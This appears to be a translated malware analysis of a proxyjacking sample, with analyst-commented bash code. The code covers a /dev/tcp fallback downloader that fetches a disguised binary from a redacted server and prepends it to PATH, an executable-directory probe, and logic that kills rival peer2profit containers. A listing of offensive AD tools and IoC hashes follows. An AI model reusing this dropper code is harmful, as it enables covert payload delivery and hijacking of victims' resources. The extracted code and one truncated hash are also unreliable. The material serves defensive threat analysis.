# Analyst note: minimal HTTP client written with bash built-ins only, used by
# the sample as a fallback downloader (see its caller c below).
# Arguments: $1 - URL of the form proto://host[:port]/path
# Outputs:   everything the server sends after the header block, on stdout
# NOTE(review): this listing appears to have lost its backslashes in
# extraction ("rn" and $'r' below were presumably "\r\n" and $'\r'); the code
# is kept exactly as printed on the page.
function __curl() {
# Replace every "/" in the URL with a space and split the result into
# protocol, host[:port] and the remaining path words.
read proto server path <<<$(echo ${1//// })
# Re-join the path words with "/" to rebuild the requested document path.
DOC=/${path// //}
# HOST drops everything from the ":" onward, PORT drops everything up to it.
HOST=${server//:*}
PORT=${server//*:}
# With no ":" in the server part both values are identical -> default to 80.
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
# Open a read/write TCP connection on fd 3 through bash's /dev/tcp
# redirection; no separate download tool is started, so process-name based
# detection of curl/wget does not see this transfer.
exec 3<>/dev/tcp/${HOST}/$PORT
# Send an HTTP/1.0 GET with a hard-coded User-Agent value ("curl/6.1.9"),
# which is a candidate string for proxy / web-log hunting.
echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnUser-Agent: curl/6.1.9rnrn" >&3
# Consume lines until the one that ends the header block, then pass the rest
# of the stream (the body) to stdout unchanged.
(while read line; do
[[ "$line" == $'r' ]] && break
done && cat) <&3
# Close fd 3.
exec 3>&-
}
# Analyst note: makes sure a "curl" command is available to the rest of the
# sample. Only acts when no curl is found on PATH.
# Globals: PATH (written - current directory is prepended)
# Outputs: "could not get curl" on stdout when the integrity check fails
c(){
# Nothing to do if the host already has curl.
if ! command -v curl &>/dev/null;then
# Download via the built-in fallback client and save the response as "curl".
# The server address is redacted in the article; the requested path ends in
# .css although the file is later made executable.
__curl http://xxx.xxx.xxx.xxx/main/dist/css/csdark.css > curl
# Integrity check against a fixed MD5; this digest is usable as a file IoC
# for the dropped binary.
if ! md5sum curl|grep -q 2a88b534fa8d58cef93e46c4ab380b23;then
echo "could not get curl"
# Terminates the whole script, not just this function.
exit
fi
chmod +x curl
# Put the working directory first on PATH so the dropped file is the one
# resolved when later commands call "curl".
export PATH=$PWD:$PATH
fi
}
# Analyst note: picks a working directory. For /dev/shm and then /tmp it
# changes into the directory, copies /bin/ls there, runs the copy and deletes
# it; the first directory where every step succeeds is kept as the cwd.
# Presumably this probes for a location that is both writable and allows
# execution (e.g. not mounted noexec) - TODO confirm against the full sample.
# Outputs: "no suitable dir" on stdout when neither directory passes
# Defensive relevance: if the probe fails in both directories the script
# exits here, before any of the steps that follow in the sample.
d(){
cd /dev/shm && cp /bin/ls . && ./ls &>/dev/null && rm -f ls && return
cd /tmp && cp /bin/ls . && ./ls &>/dev/null && rm -f ls && return
# Disabled third candidate left in the sample by its author:
#mkdir -p $HOME/.cache/apt && cd $HOME/.cache/apt && return
echo "no suitable dir"
# Terminates the whole script, not just this function.
exit
}
# Analyst note: excerpt of the sample's main body. The "[...]" markers are
# elisions made by the article, so this fragment is not runnable as printed
# (the first "if" also has no closing "fi" in the excerpt).
# "$PACCT" is defined outside the excerpt - presumably the operator's own
# account identifier; verify against the full sample.

# Single-instance guard: search the process tree listing for "$PACCT" and
# stop if a match is found.
if ps axjf|[...]|grep […] "$PACCT";then
echo "already running"
exit
# Look for running containers whose listing matches peer2profit / p2pclient.
if docker ps [...] |grep [...] peer2profit [...] p2pclient;then
for con in [...];do
# Act only on containers that do NOT match "$PACCT", i.e. instances that are
# not the operator's own.
if ! docker [...]|grep [...] "$PACCT";then
[...]
# Three stop attempts: 10-second timeout, KILL signal, then a plain stop.
docker stop -t 10 $con
docker stop -s KILL $con
docker stop $con
echo "killed container: $con"
fi
done
fi
# NOTE(review): unclear from the excerpt whether this line still belongs to
# the script or to a separate terminal listing; it moves up one directory and
# recursively deletes "pfp".
cd .. && rm -rf pfp
ls
exchanger.py getST.py ldd2pretty normalizer
secretsdump.py split.py
findDelegation.py getTGT.py lookupsid.py ntfs-read.py
services.py ticketConverter.py
crontab flask GetUserSPNs.py machine_role.py ntlmrelayx.py
smbclient.py ticketer.py
cygdb futurize goldenPac.py mimikatz.py pasteurize
smbexec.py top
cython GetADUsers.py karmaSMB.py mqtt_check.py ping6.py
smbpasswd.py wmiexec.py
cythonize getArch.py keylistattack.py mssqlclient.py ping.py
smbrelayx.py wmipersist.py
Get-GPPPassword.py kintercept.py mssqlinstance.py
rpcmap.py smbserver.py wmiquery.py
GetNPUsers.py ldapdomaindump netview.py ps.old
sniffer.py
getPac.py ldd2bloodhound nmapAnswerMachine.py
__pycache__ samrdump.py sniff.py
IOCs
Hashes
-
6f1ac1e711e662edad32713c135ce29562d636794cf5a21a44bbb34955610f0a - vksp
-
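72e7dd199bed6eefa0ae763c399e0d8a56e2b1dfacc089046706226a5f2a (as printed this value has 60 hex characters, while the hash above has 64; it appears truncated, so confirm it against the original report before using it for matching)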
原文始发于微信公众号(Ots安全):代理劫持:最新的网络犯罪副业